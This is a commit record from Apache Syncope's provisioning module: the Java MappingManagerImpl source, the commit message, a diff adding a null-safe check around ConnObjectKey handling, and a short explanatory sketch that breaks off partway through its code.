"password": if (anyTO instanceof UserTO && !values.isEmpty()) { ((UserTO) anyTO).setPassword(ConnObjectUtils.getPassword(values.get(0))); } break; case "username": if (anyTO instanceof UserTO) { ((UserTO) anyTO).setUsername(values.isEmpty() || values.get(0) == null ? null : values.get(0).toString()); } break; case "name": if (anyTO instanceof GroupTO) { ((GroupTO) anyTO).setName(values.isEmpty() || values.get(0) == null ? null : values.get(0).toString()); } else if (anyTO instanceof AnyObjectTO) { ((AnyObjectTO) anyTO).setName(values.isEmpty() || values.get(0) == null ? 
null : values.get(0).toString()); } break; case "userOwner": case "groupOwner": if (anyTO instanceof GroupTO && attr != null) { // using a special attribute (with schema "", that will be ignored) for carrying the // GroupOwnerSchema value AttrTO attrTO = new AttrTO(); attrTO.setSchema(StringUtils.EMPTY); if (values.isEmpty() || values.get(0) == null) { attrTO.getValues().add(StringUtils.EMPTY); } else { attrTO.getValues().add(values.get(0).toString()); } ((GroupTO) anyTO).getPlainAttrs().add(attrTO); } break; default: } } else if (intAttrName.getSchemaType() != null) { GroupableRelatableTO groupableTO = null; Group group = null; if (anyTO instanceof GroupableRelatableTO && intAttrName.getMembershipOfGroup() != null) { groupableTO = (GroupableRelatableTO) anyTO; group = groupDAO.findByName(intAttrName.getMembershipOfGroup()); } switch (intAttrName.getSchemaType()) { case PLAIN: AttrTO attrTO = new AttrTO(); attrTO.setSchema(intAttrName.getSchemaName()); PlainSchema schema = plainSchemaDAO.find(intAttrName.getSchemaName()); for (Object value : values) { AttrSchemaType schemaType = schema == null ? AttrSchemaType.String : schema.getType(); if (value != null) { PlainAttrValue attrValue = anyUtils.newPlainAttrValue(); switch (schemaType) { case String: attrValue.setStringValue(value.toString()); break; case Binary: attrValue.setBinaryValue((byte[]) value); break; default: try { attrValue.parseValue(schema, value.toString()); } catch (ParsingValidationException e) { LOG.error("While parsing provided value {}", value, e); attrValue.setStringValue(value.toString()); schemaType = AttrSchemaType.String; } break; } attrTO.getValues().add(attrValue.getValueAsString(schemaType)); } } if (groupableTO == null || group == null) { anyTO.getPlainAttrs().add(attrTO); } else { Optional<MembershipTO> membership = groupableTO.getMembership(group.getKey()); if (!membership.isPresent()) { membership = Optional.of( new MembershipTO.Builder().group(group.getKey(), group.getName()).build()); groupableTO.getMemberships().add(membership.get()); } membership.get().getPlainAttrs().add(attrTO); } break; case DERIVED: attrTO = new AttrTO(); attrTO.setSchema(intAttrName.getSchemaName()); if (groupableTO == null || group == null) { anyTO.getDerAttrs().add(attrTO); } else { Optional<MembershipTO> membership = groupableTO.getMembership(group.getKey()); if (!membership.isPresent()) { membership = Optional.of( new MembershipTO.Builder().group(group.getKey(), group.getName()).build()); groupableTO.getMemberships().add(membership.get()); } membership.get().getDerAttrs().add(attrTO); } break; case VIRTUAL: attrTO = new AttrTO(); attrTO.setSchema(intAttrName.getSchemaName()); // virtual attributes don't get transformed, iterate over original attr.getValue() if (attr != null && attr.getValue() != null && !attr.getValue().isEmpty()) { attr.getValue().stream(). filter(value -> value != null). 
forEachOrdered(value -> attrTO.getValues().add(value.toString())); } if (groupableTO == null || group == null) { anyTO.getVirAttrs().add(attrTO); } else { Optional<MembershipTO> membership = groupableTO.getMembership(group.getKey()); if (!membership.isPresent()) { membership = Optional.of( new MembershipTO.Builder().group(group.getKey(), group.getName()).build()); groupableTO.getMemberships().add(membership.get()); } membership.get().getVirAttrs().add(attrTO); } break; default: } } } @Override public void setIntValues(final Item orgUnitItem, final Attribute attr, final RealmTO realmTO) { List<Object> values = null; if (attr != null) { values = attr.getValue(); for (ItemTransformer transformer : MappingUtils.getItemTransformers(orgUnitItem)) { values = transformer.beforePull(orgUnitItem, realmTO, values); } } if (values != null && !values.isEmpty() && values.get(0) != null) { switch (orgUnitItem.getIntAttrName()) { case "name": realmTO.setName(values.get(0).toString()); break; case "fullpath": String parentFullPath = StringUtils.substringBeforeLast(values.get(0).toString(), "/"); Realm parent = realmDAO.findByFullPath(parentFullPath); if (parent == null) { LOG.warn("Could not find Realm with path {}, ignoring", parentFullPath); } else { realmTO.setParent(parent.getFullPath()); } break; default: } } } }
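Relative to the previous revision of this file (the old contents reproduced below), the main functional change in prepareAttrs is that the connObjectKey/__NAME__ handling is now guarded by Optional.isPresent(): the old code called MappingUtils.getConnObjectKeyItem(provision).get() unconditionally, which throws NoSuchElementException when no connObjectKey item is mapped. A minimal, self-contained illustration of that guard in plain Java (the class and method names here are invented for the example and are not Syncope code):

import java.util.Optional;

public class ConnObjectKeyGuardExample {

    // Stand-in for MappingUtils.getConnObjectKeyItem(provision): may be empty.
    static Optional<String> connObjectKeyItem(boolean mapped) {
        return mapped ? Optional.of("uid") : Optional.empty();
    }

    public static void main(String[] args) {
        Optional<String> item = connObjectKeyItem(false);

        // New revision: build the __NAME__/connObjectKey attributes only when an item is present.
        if (item.isPresent()) {
            System.out.println("would build __NAME__ from " + item.get());
        } else {
            System.out.println("no connObjectKey item mapped, skipping __NAME__");
        }

        // Old revision, for comparison: calling item.get() here would throw NoSuchElementException.
    }
}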
core/provisioning-java/src/main/java/org/apache/syncope/core/provisioning/java/MappingManagerImpl.java
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.apache.syncope.core.provisioning.java; import java.util.ArrayList; import java.util.Collections; import java.util.HashSet; import java.util.List; import java.util.Optional; import java.util.Set; import org.apache.commons.lang3.StringUtils; import org.apache.commons.lang3.reflect.FieldUtils; import org.apache.commons.lang3.tuple.Pair; import org.apache.syncope.common.lib.to.AnyObjectTO; import org.apache.syncope.common.lib.to.AnyTO; import org.apache.syncope.common.lib.to.AttrTO; import org.apache.syncope.common.lib.to.GroupTO; import org.apache.syncope.common.lib.to.GroupableRelatableTO; import org.apache.syncope.common.lib.to.MembershipTO; import org.apache.syncope.common.lib.to.RealmTO; import org.apache.syncope.common.lib.to.UserTO; import org.apache.syncope.common.lib.types.AttrSchemaType; import org.apache.syncope.core.persistence.api.attrvalue.validation.ParsingValidationException; import org.apache.syncope.core.persistence.api.dao.AnyObjectDAO; import org.apache.syncope.core.persistence.api.dao.AnyTypeDAO; import org.apache.syncope.core.persistence.api.dao.DerSchemaDAO; import org.apache.syncope.core.persistence.api.dao.GroupDAO; import org.apache.syncope.core.persistence.api.dao.PlainSchemaDAO; import org.apache.syncope.core.persistence.api.dao.RealmDAO; import org.apache.syncope.core.persistence.api.dao.VirSchemaDAO; import org.apache.syncope.core.persistence.api.entity.Any; import org.apache.syncope.core.persistence.api.entity.AnyUtils; import org.apache.syncope.core.persistence.api.entity.AnyUtilsFactory; import org.apache.syncope.core.persistence.api.entity.DerSchema; import org.apache.syncope.core.persistence.api.entity.EntityFactory; import org.apache.syncope.core.persistence.api.entity.GroupableRelatable; import org.apache.syncope.core.persistence.api.entity.Membership; import org.apache.syncope.core.persistence.api.entity.PlainAttr; import org.apache.syncope.core.persistence.api.entity.PlainAttrValue; import org.apache.syncope.core.persistence.api.entity.PlainSchema; import org.apache.syncope.core.persistence.api.entity.Realm; import org.apache.syncope.core.persistence.api.entity.Schema; import org.apache.syncope.core.persistence.api.entity.VirSchema; import org.apache.syncope.core.persistence.api.entity.anyobject.AnyObject; import org.apache.syncope.core.persistence.api.entity.group.Group; import org.apache.syncope.core.persistence.api.entity.resource.Item; import org.apache.syncope.core.persistence.api.entity.resource.Mapping; import org.apache.syncope.core.persistence.api.entity.resource.MappingItem; import org.apache.syncope.core.persistence.api.entity.resource.OrgUnit; import org.apache.syncope.core.persistence.api.entity.resource.OrgUnitItem; import 
org.apache.syncope.core.persistence.api.entity.resource.Provision; import org.apache.syncope.core.persistence.api.entity.user.UPlainAttrValue; import org.apache.syncope.core.persistence.api.entity.user.User; import org.apache.syncope.core.provisioning.api.DerAttrHandler; import org.apache.syncope.core.provisioning.api.IntAttrName; import org.apache.syncope.core.provisioning.api.MappingManager; import org.apache.syncope.core.provisioning.api.VirAttrHandler; import org.apache.syncope.core.provisioning.api.cache.VirAttrCache; import org.apache.syncope.core.provisioning.api.utils.policy.InvalidPasswordRuleConf; import org.apache.syncope.core.provisioning.java.utils.ConnObjectUtils; import org.apache.syncope.core.provisioning.java.utils.MappingUtils; import org.apache.syncope.core.spring.security.Encryptor; import org.apache.syncope.core.spring.security.PasswordGenerator; import org.identityconnectors.framework.common.FrameworkUtil; import org.identityconnectors.framework.common.objects.Attribute; import org.identityconnectors.framework.common.objects.AttributeBuilder; import org.identityconnectors.framework.common.objects.AttributeUtil; import org.identityconnectors.framework.common.objects.OperationalAttributes; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.stereotype.Component; import org.springframework.transaction.annotation.Transactional; import org.apache.syncope.core.provisioning.api.data.ItemTransformer; import org.identityconnectors.framework.common.objects.Name; @Component public class MappingManagerImpl implements MappingManager { private static final Logger LOG = LoggerFactory.getLogger(MappingManager.class); private static final Encryptor ENCRYPTOR = Encryptor.getInstance(); @Autowired private AnyTypeDAO anyTypeDAO; @Autowired private PlainSchemaDAO plainSchemaDAO; @Autowired private DerSchemaDAO derSchemaDAO; @Autowired private VirSchemaDAO virSchemaDAO; @Autowired private AnyObjectDAO anyObjectDAO; @Autowired private GroupDAO groupDAO; @Autowired private RealmDAO realmDAO; @Autowired private DerAttrHandler derAttrHandler; @Autowired private VirAttrHandler virAttrHandler; @Autowired private VirAttrCache virAttrCache; @Autowired private PasswordGenerator passwordGenerator; @Autowired private EntityFactory entityFactory; @Autowired private AnyUtilsFactory anyUtilsFactory; @Autowired private IntAttrNameParser intAttrNameParser; @Transactional(readOnly = true) @Override public Pair<String, Set<Attribute>> prepareAttrs( final Any<?> any, final String password, final boolean changePwd, final Boolean enable, final Provision provision) { LOG.debug("Preparing resource attributes for {} with provision {} for attributes {}", any, provision, any.getPlainAttrs()); Set<Attribute> attributes = new HashSet<>(); String connObjectKey = null; for (Item mapItem : MappingUtils.getPropagationItems(provision.getMapping().getItems())) { LOG.debug("Processing expression '{}'", mapItem.getIntAttrName()); try { Pair<String, Attribute> preparedAttr = prepareAttr(provision, mapItem, any, password); if (preparedAttr != null) { if (preparedAttr.getLeft() != null) { connObjectKey = preparedAttr.getLeft(); } if (preparedAttr.getRight() != null) { Attribute alreadyAdded = AttributeUtil.find(preparedAttr.getRight().getName(), attributes); if (alreadyAdded == null) { attributes.add(preparedAttr.getRight()); } else { attributes.remove(alreadyAdded); Set<Object> values = new HashSet<>(); if (alreadyAdded.getValue() != 
null && !alreadyAdded.getValue().isEmpty()) { values.addAll(alreadyAdded.getValue()); } if (preparedAttr.getRight().getValue() != null) { values.addAll(preparedAttr.getRight().getValue()); } attributes.add(AttributeBuilder.build(preparedAttr.getRight().getName(), values)); } } } } catch (Exception e) { LOG.error("Expression '{}' processing failed", mapItem.getIntAttrName(), e); } } Attribute connObjectKeyExtAttr = AttributeUtil.find(MappingUtils.getConnObjectKeyItem(provision).get().getExtAttrName(), attributes); if (connObjectKeyExtAttr != null) { attributes.remove(connObjectKeyExtAttr); attributes.add(AttributeBuilder.build( MappingUtils.getConnObjectKeyItem(provision).get().getExtAttrName(), connObjectKey)); } Name name = MappingUtils.evaluateNAME(any, provision, connObjectKey); attributes.add(name); if (connObjectKey != null && !connObjectKey.equals(name.getNameValue()) && connObjectKeyExtAttr == null) { attributes.add(AttributeBuilder.build( MappingUtils.getConnObjectKeyItem(provision).get().getExtAttrName(), connObjectKey)); } if (enable != null) { attributes.add(AttributeBuilder.buildEnabled(enable)); } if (!changePwd) { Attribute pwdAttr = AttributeUtil.find(OperationalAttributes.PASSWORD_NAME, attributes); if (pwdAttr != null) { attributes.remove(pwdAttr); } } return Pair.of(connObjectKey, attributes); } private String getIntValue(final Realm realm, final Item orgUnitItem) { String value = null; switch (orgUnitItem.getIntAttrName()) { case "key": value = realm.getKey(); break; case "name": value = realm.getName(); break; case "fullpath": value = realm.getFullPath(); break; default: } return value; } @Override public Pair<String, Set<Attribute>> prepareAttrs(final Realm realm, final OrgUnit orgUnit) { LOG.debug("Preparing resource attributes for {} with orgUnit {}", realm, orgUnit); Set<Attribute> attributes = new HashSet<>(); String connObjectKey = null; for (Item orgUnitItem : MappingUtils.getPropagationItems(orgUnit.getItems())) { LOG.debug("Processing expression '{}'", orgUnitItem.getIntAttrName()); String value = getIntValue(realm, orgUnitItem); if (orgUnitItem.isConnObjectKey()) { connObjectKey = value; } Attribute alreadyAdded = AttributeUtil.find(orgUnitItem.getExtAttrName(), attributes); if (alreadyAdded == null) { if (value == null) { attributes.add(AttributeBuilder.build(orgUnitItem.getExtAttrName())); } else { attributes.add(AttributeBuilder.build(orgUnitItem.getExtAttrName(), value)); } } else if (value != null) { attributes.remove(alreadyAdded); Set<Object> values = new HashSet<>(); if (alreadyAdded.getValue() != null && !alreadyAdded.getValue().isEmpty()) { values.addAll(alreadyAdded.getValue()); } values.add(value); attributes.add(AttributeBuilder.build(orgUnitItem.getExtAttrName(), values)); } } Attribute connObjectKeyExtAttr = AttributeUtil.find(orgUnit.getConnObjectKeyItem().get().getExtAttrName(), attributes); if (connObjectKeyExtAttr != null) { attributes.remove(connObjectKeyExtAttr); attributes.add( AttributeBuilder.build(orgUnit.getConnObjectKeyItem().get().getExtAttrName(), connObjectKey)); } attributes.add(MappingUtils.evaluateNAME(realm, orgUnit, connObjectKey)); return Pair.of(connObjectKey, attributes); } /** * Prepare an attribute to be sent to a connector instance. 
* * @param provision external resource * @param mapItem mapping item for the given attribute * @param any given any object * @param password clear-text password * @return connObjectKey + prepared attribute */ private Pair<String, Attribute> prepareAttr( final Provision provision, final Item mapItem, final Any<?> any, final String password) { IntAttrName intAttrName = intAttrNameParser.parse(mapItem.getIntAttrName(), provision.getAnyType().getKind()); boolean readOnlyVirSchema = false; Schema schema = null; AttrSchemaType schemaType = AttrSchemaType.String; if (intAttrName.getSchemaType() != null) { switch (intAttrName.getSchemaType()) { case PLAIN: schema = plainSchemaDAO.find(intAttrName.getSchemaName()); if (schema != null) { schemaType = schema.getType(); } break; case VIRTUAL: schema = virSchemaDAO.find(intAttrName.getSchemaName()); readOnlyVirSchema = (schema != null && schema.isReadonly()); break; default: } } List<PlainAttrValue> values = getIntValues(provision, mapItem, intAttrName, any); LOG.debug("Define mapping for: " + "\n* ExtAttrName " + mapItem.getExtAttrName() + "\n* is connObjectKey " + mapItem.isConnObjectKey() + "\n* is password " + mapItem.isPassword() + "\n* mandatory condition " + mapItem.getMandatoryCondition() + "\n* Schema " + intAttrName.getSchemaName() + "\n* ClassType " + schemaType.getType().getName() + "\n* Values " + values); Pair<String, Attribute> result; if (readOnlyVirSchema) { result = null; } else { List<Object> objValues = new ArrayList<>(); for (PlainAttrValue value : values) { if (FrameworkUtil.isSupportedAttributeType(schemaType.getType())) { objValues.add(value.getValue()); } else { objValues.add(value.getValueAsString(schemaType)); } } if (mapItem.isConnObjectKey()) { result = Pair.of(objValues.isEmpty() ? null : objValues.iterator().next().toString(), null); } else if (mapItem.isPassword() && any instanceof User) { String passwordAttrValue = password; if (StringUtils.isBlank(passwordAttrValue)) { User user = (User) any; if (user.canDecodePassword()) { try { passwordAttrValue = ENCRYPTOR.decode(user.getPassword(), user.getCipherAlgorithm()); } catch (Exception e) { LOG.error("Could not decode password for {}", user, e); } } else if (provision.getResource().isRandomPwdIfNotProvided()) { try { passwordAttrValue = passwordGenerator.generate(provision.getResource()); } catch (InvalidPasswordRuleConf e) { LOG.error("Could not generate policy-compliant random password for {}", user, e); } } } if (passwordAttrValue == null) { result = null; } else { result = Pair.of(null, AttributeBuilder.buildPassword(passwordAttrValue.toCharArray())); } } else if (schema != null && schema.isMultivalue()) { result = Pair.of(null, AttributeBuilder.build(mapItem.getExtAttrName(), objValues)); } else { result = Pair.of(null, objValues.isEmpty() ? 
AttributeBuilder.build(mapItem.getExtAttrName()) : AttributeBuilder.build(mapItem.getExtAttrName(), objValues.iterator().next())); } } return result; } @Transactional(readOnly = true) @Override public List<PlainAttrValue> getIntValues( final Provision provision, final Item mapItem, final IntAttrName intAttrName, final Any<?> any) { LOG.debug("Get internal values for {} as '{}' on {}", any, mapItem.getIntAttrName(), provision.getResource()); Any<?> reference = null; Membership<?> membership = null; if (intAttrName.getEnclosingGroup() == null && intAttrName.getRelatedAnyObject() == null) { reference = any; } if (any instanceof GroupableRelatable) { GroupableRelatable<?, ?, ?, ?, ?> groupableRelatable = (GroupableRelatable<?, ?, ?, ?, ?>) any; if (intAttrName.getEnclosingGroup() != null) { Group group = groupDAO.findByName(intAttrName.getEnclosingGroup()); if (group == null || groupableRelatable.getMembership(group.getKey()) == null) { LOG.warn("No membership for {} in {}, ignoring", intAttrName.getEnclosingGroup(), groupableRelatable); } else { reference = group; } } else if (intAttrName.getRelatedAnyObject() != null) { AnyObject anyObject = anyObjectDAO.findByName(intAttrName.getRelatedAnyObject()); if (anyObject == null || groupableRelatable.getRelationships(anyObject.getKey()).isEmpty()) { LOG.warn("No relationship for {} in {}, ignoring", intAttrName.getRelatedAnyObject(), groupableRelatable); } else { reference = anyObject; } } else if (intAttrName.getMembershipOfGroup() != null) { Group group = groupDAO.findByName(intAttrName.getMembershipOfGroup()); membership = groupableRelatable.getMembership(group.getKey()).orElse(null); } } if (reference == null) { LOG.warn("Could not determine the reference instance for {}", mapItem.getIntAttrName()); return Collections.emptyList(); } List<PlainAttrValue> values = new ArrayList<>(); boolean transform = true; AnyUtils anyUtils = anyUtilsFactory.getInstance(reference); if (intAttrName.getField() != null) { PlainAttrValue attrValue = anyUtils.newPlainAttrValue(); switch (intAttrName.getField()) { case "key": attrValue.setStringValue(reference.getKey()); values.add(attrValue); break; case "password": // ignore break; case "username": if (reference instanceof User) { attrValue = entityFactory.newEntity(UPlainAttrValue.class); attrValue.setStringValue(((User) reference).getUsername()); values.add(attrValue); } break; case "name": if (reference instanceof Group) { attrValue = entityFactory.newEntity(UPlainAttrValue.class); attrValue.setStringValue(((Group) reference).getName()); values.add(attrValue); } else if (reference instanceof AnyObject) { attrValue = entityFactory.newEntity(UPlainAttrValue.class); attrValue.setStringValue(((AnyObject) reference).getName()); values.add(attrValue); } break; case "userOwner": case "groupOwner": Mapping uMapping = provision.getAnyType().equals(anyTypeDAO.findUser()) ? provision.getMapping() : null; Mapping gMapping = provision.getAnyType().equals(anyTypeDAO.findGroup()) ? 
provision.getMapping() : null; if (reference instanceof Group) { Group group = (Group) reference; String groupOwnerValue = null; if (group.getUserOwner() != null && uMapping != null) { groupOwnerValue = getGroupOwnerValue(provision, group.getUserOwner()); } if (group.getGroupOwner() != null && gMapping != null) { groupOwnerValue = getGroupOwnerValue(provision, group.getGroupOwner()); } if (StringUtils.isNotBlank(groupOwnerValue)) { attrValue = entityFactory.newEntity(UPlainAttrValue.class); attrValue.setStringValue(groupOwnerValue); values.add(attrValue); } } break; default: try { attrValue.setStringValue(FieldUtils.readField( reference, intAttrName.getField(), true).toString()); values.add(attrValue); } catch (IllegalAccessException e) { LOG.error("Could not read value of '{}' from {}", intAttrName.getField(), reference, e); } } } else if (intAttrName.getSchemaType() != null) { switch (intAttrName.getSchemaType()) { case PLAIN: PlainAttr<?> attr; if (membership == null) { attr = reference.getPlainAttr(intAttrName.getSchemaName()).orElse(null); } else { attr = ((GroupableRelatable<?, ?, ?, ?, ?>) reference).getPlainAttr( intAttrName.getSchemaName(), membership).orElse(null); } if (attr != null) { if (attr.getUniqueValue() != null) { values.add(anyUtils.clonePlainAttrValue(attr.getUniqueValue())); } else if (attr.getValues() != null) { attr.getValues().forEach(value -> values.add(anyUtils.clonePlainAttrValue(value))); } } break; case DERIVED: DerSchema derSchema = derSchemaDAO.find(intAttrName.getSchemaName()); if (derSchema != null) { String value = membership == null ? derAttrHandler.getValue(reference, derSchema) : derAttrHandler.getValue(reference, membership, derSchema); if (value != null) { PlainAttrValue attrValue = anyUtils.newPlainAttrValue(); attrValue.setStringValue(value); values.add(attrValue); } } break; case VIRTUAL: // virtual attributes don't get transformed transform = false; VirSchema virSchema = virSchemaDAO.find(intAttrName.getSchemaName()); if (virSchema != null) { LOG.debug("Expire entry cache {}-{}", reference, intAttrName.getSchemaName()); virAttrCache.expire( reference.getType().getKey(), reference.getKey(), intAttrName.getSchemaName()); List<String> virValues = membership == null ? virAttrHandler.getValues(reference, virSchema) : virAttrHandler.getValues(reference, membership, virSchema); virValues.stream(). map(value -> { PlainAttrValue attrValue = anyUtils.newPlainAttrValue(); attrValue.setStringValue(value); return attrValue; }). 
forEachOrdered(attrValue -> values.add(attrValue)); } break; default: } } LOG.debug("Internal values: {}", values); List<PlainAttrValue> transformed = values; if (transform) { for (ItemTransformer transformer : MappingUtils.getItemTransformers(mapItem)) { transformed = transformer.beforePropagation(mapItem, any, transformed); } LOG.debug("Transformed values: {}", values); } else { LOG.debug("No transformation occurred"); } return transformed; } private String getGroupOwnerValue(final Provision provision, final Any<?> any) { Pair<String, Attribute> preparedAttr = prepareAttr(provision, MappingUtils.getConnObjectKeyItem(provision).get(), any, null); String connObjectKey = preparedAttr.getKey(); return MappingUtils.evaluateNAME(any, provision, connObjectKey).getNameValue(); } @Transactional(readOnly = true) @Override public Optional<String> getConnObjectKeyValue(final Any<?> any, final Provision provision) { MappingItem mapItem = provision.getMapping().getConnObjectKeyItem().get(); List<PlainAttrValue> values = getIntValues( provision, mapItem, intAttrNameParser.parse(mapItem.getIntAttrName(), provision.getAnyType().getKind()), any); return Optional.ofNullable(values.isEmpty() ? null : values.get(0).getValueAsString()); } @Transactional(readOnly = true) @Override public String getConnObjectKeyValue(final Realm realm, final OrgUnit orgUnit) { OrgUnitItem orgUnitItem = orgUnit.getConnObjectKeyItem().get(); return getIntValue(realm, orgUnitItem); } @Transactional(readOnly = true) @Override public void setIntValues(final Item mapItem, final Attribute attr, final AnyTO anyTO, final AnyUtils anyUtils) { List<Object> values = null; if (attr != null) { values = attr.getValue(); for (ItemTransformer transformer : MappingUtils.getItemTransformers(mapItem)) { values = transformer.beforePull(mapItem, anyTO, values); } } values = values == null ? Collections.emptyList() : values; IntAttrName intAttrName = intAttrNameParser.parse(mapItem.getIntAttrName(), anyUtils.getAnyTypeKind()); if (intAttrName.getField() != null) { switch (intAttrName.getField()) { case "password": if (anyTO instanceof UserTO && !values.isEmpty()) { ((UserTO) anyTO).setPassword(ConnObjectUtils.getPassword(values.get(0))); } break; case "username": if (anyTO instanceof UserTO) { ((UserTO) anyTO).setUsername(values.isEmpty() || values.get(0) == null ? null : values.get(0).toString()); } break; case "name": if (anyTO instanceof GroupTO) { ((GroupTO) anyTO).setName(values.isEmpty() || values.get(0) == null ? null : values.get(0).toString()); } else if (anyTO instanceof AnyObjectTO) { ((AnyObjectTO) anyTO).setName(values.isEmpty() || values.get(0) == null ? 
null : values.get(0).toString()); } break; case "userOwner": case "groupOwner": if (anyTO instanceof GroupTO && attr != null) { // using a special attribute (with schema "", that will be ignored) for carrying the // GroupOwnerSchema value AttrTO attrTO = new AttrTO(); attrTO.setSchema(StringUtils.EMPTY); if (values.isEmpty() || values.get(0) == null) { attrTO.getValues().add(StringUtils.EMPTY); } else { attrTO.getValues().add(values.get(0).toString()); } ((GroupTO) anyTO).getPlainAttrs().add(attrTO); } break; default: } } else if (intAttrName.getSchemaType() != null) { GroupableRelatableTO groupableTO = null; Group group = null; if (anyTO instanceof GroupableRelatableTO && intAttrName.getMembershipOfGroup() != null) { groupableTO = (GroupableRelatableTO) anyTO; group = groupDAO.findByName(intAttrName.getMembershipOfGroup()); } switch (intAttrName.getSchemaType()) { case PLAIN: AttrTO attrTO = new AttrTO(); attrTO.setSchema(intAttrName.getSchemaName()); PlainSchema schema = plainSchemaDAO.find(intAttrName.getSchemaName()); for (Object value : values) { AttrSchemaType schemaType = schema == null ? AttrSchemaType.String : schema.getType(); if (value != null) { PlainAttrValue attrValue = anyUtils.newPlainAttrValue(); switch (schemaType) { case String: attrValue.setStringValue(value.toString()); break; case Binary: attrValue.setBinaryValue((byte[]) value); break; default: try { attrValue.parseValue(schema, value.toString()); } catch (ParsingValidationException e) { LOG.error("While parsing provided value {}", value, e); attrValue.setStringValue(value.toString()); schemaType = AttrSchemaType.String; } break; } attrTO.getValues().add(attrValue.getValueAsString(schemaType)); } } if (groupableTO == null || group == null) { anyTO.getPlainAttrs().add(attrTO); } else { Optional<MembershipTO> membership = groupableTO.getMembership(group.getKey()); if (!membership.isPresent()) { membership = Optional.of( new MembershipTO.Builder().group(group.getKey(), group.getName()).build()); groupableTO.getMemberships().add(membership.get()); } membership.get().getPlainAttrs().add(attrTO); } break; case DERIVED: attrTO = new AttrTO(); attrTO.setSchema(intAttrName.getSchemaName()); if (groupableTO == null || group == null) { anyTO.getDerAttrs().add(attrTO); } else { Optional<MembershipTO> membership = groupableTO.getMembership(group.getKey()); if (!membership.isPresent()) { membership = Optional.of( new MembershipTO.Builder().group(group.getKey(), group.getName()).build()); groupableTO.getMemberships().add(membership.get()); } membership.get().getDerAttrs().add(attrTO); } break; case VIRTUAL: attrTO = new AttrTO(); attrTO.setSchema(intAttrName.getSchemaName()); // virtual attributes don't get transformed, iterate over original attr.getValue() if (attr != null && attr.getValue() != null && !attr.getValue().isEmpty()) { attr.getValue().stream(). filter(value -> value != null). 
forEachOrdered(value -> attrTO.getValues().add(value.toString())); } if (groupableTO == null || group == null) { anyTO.getVirAttrs().add(attrTO); } else { Optional<MembershipTO> membership = groupableTO.getMembership(group.getKey()); if (!membership.isPresent()) { membership = Optional.of( new MembershipTO.Builder().group(group.getKey(), group.getName()).build()); groupableTO.getMemberships().add(membership.get()); } membership.get().getVirAttrs().add(attrTO); } break; default: } } } @Override public void setIntValues(final Item orgUnitItem, final Attribute attr, final RealmTO realmTO) { List<Object> values = null; if (attr != null) { values = attr.getValue(); for (ItemTransformer transformer : MappingUtils.getItemTransformers(orgUnitItem)) { values = transformer.beforePull(orgUnitItem, realmTO, values); } } if (values != null && !values.isEmpty() && values.get(0) != null) { switch (orgUnitItem.getIntAttrName()) { case "name": realmTO.setName(values.get(0).toString()); break; case "fullpath": String parentFullPath = StringUtils.substringBeforeLast(values.get(0).toString(), "/"); Realm parent = realmDAO.findByFullPath(parentFullPath); if (parent == null) { LOG.warn("Could not find Realm with path {}, ignoring", parentFullPath); } else { realmTO.setParent(parent.getFullPath()); } break; default: } } } }
More robust ConnObjectKey handling
core/provisioning-java/src/main/java/org/apache/syncope/core/provisioning/java/MappingManagerImpl.java
More robust ConnObjectKey handling
<ide><path>ore/provisioning-java/src/main/java/org/apache/syncope/core/provisioning/java/MappingManagerImpl.java <ide> } <ide> } <ide> <del> Attribute connObjectKeyExtAttr = <del> AttributeUtil.find(MappingUtils.getConnObjectKeyItem(provision).get().getExtAttrName(), attributes); <del> if (connObjectKeyExtAttr != null) { <del> attributes.remove(connObjectKeyExtAttr); <del> attributes.add(AttributeBuilder.build( <del> MappingUtils.getConnObjectKeyItem(provision).get().getExtAttrName(), connObjectKey)); <del> } <del> Name name = MappingUtils.evaluateNAME(any, provision, connObjectKey); <del> attributes.add(name); <del> if (connObjectKey != null && !connObjectKey.equals(name.getNameValue()) && connObjectKeyExtAttr == null) { <del> attributes.add(AttributeBuilder.build( <del> MappingUtils.getConnObjectKeyItem(provision).get().getExtAttrName(), connObjectKey)); <add> Optional<MappingItem> connObjectKeyItem = MappingUtils.getConnObjectKeyItem(provision); <add> if (connObjectKeyItem.isPresent()) { <add> Attribute connObjectKeyExtAttr = AttributeUtil.find(connObjectKeyItem.get().getExtAttrName(), attributes); <add> if (connObjectKeyExtAttr != null) { <add> attributes.remove(connObjectKeyExtAttr); <add> attributes.add(AttributeBuilder.build(connObjectKeyItem.get().getExtAttrName(), connObjectKey)); <add> } <add> Name name = MappingUtils.evaluateNAME(any, provision, connObjectKey); <add> attributes.add(name); <add> if (connObjectKey != null && !connObjectKey.equals(name.getNameValue()) && connObjectKeyExtAttr == null) { <add> attributes.add(AttributeBuilder.build(connObjectKeyItem.get().getExtAttrName(), connObjectKey)); <add> } <ide> } <ide> <ide> if (enable != null) {
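The diff above replaces an unconditional Optional.get() on the ConnObjectKey mapping item with an isPresent() guard, so a provision whose mapping declares no ConnObjectKey item no longer fails with NoSuchElementException during attribute preparation. The following is a minimal standalone sketch of that guard pattern only; MappingItem and getConnObjectKeyItem here are simplified stand-ins for the Syncope classes and helper, not the real API.

// Sketch of the guard introduced by the diff above: the connObjectKey post-processing
// only runs when a ConnObjectKey mapping item is actually present, instead of calling
// Optional.get() unconditionally. All names below are illustrative stand-ins.
import java.util.Optional;

public class ConnObjectKeyGuardSketch {

    // Stand-in for the mapping item type; only the external attribute name matters here.
    static class MappingItem {
        private final String extAttrName;

        MappingItem(final String extAttrName) {
            this.extAttrName = extAttrName;
        }

        String getExtAttrName() {
            return extAttrName;
        }
    }

    // Stand-in for a lookup such as MappingUtils.getConnObjectKeyItem(provision):
    // it may be empty when the mapping declares no ConnObjectKey item.
    static Optional<MappingItem> getConnObjectKeyItem(final boolean defined) {
        return defined ? Optional.of(new MappingItem("uid")) : Optional.<MappingItem>empty();
    }

    public static void main(final String[] args) {
        for (boolean defined : new boolean[] { true, false }) {
            Optional<MappingItem> connObjectKeyItem = getConnObjectKeyItem(defined);

            // Before the change, an unconditional get() here would throw
            // NoSuchElementException whenever the item is missing.
            if (connObjectKeyItem.isPresent()) {
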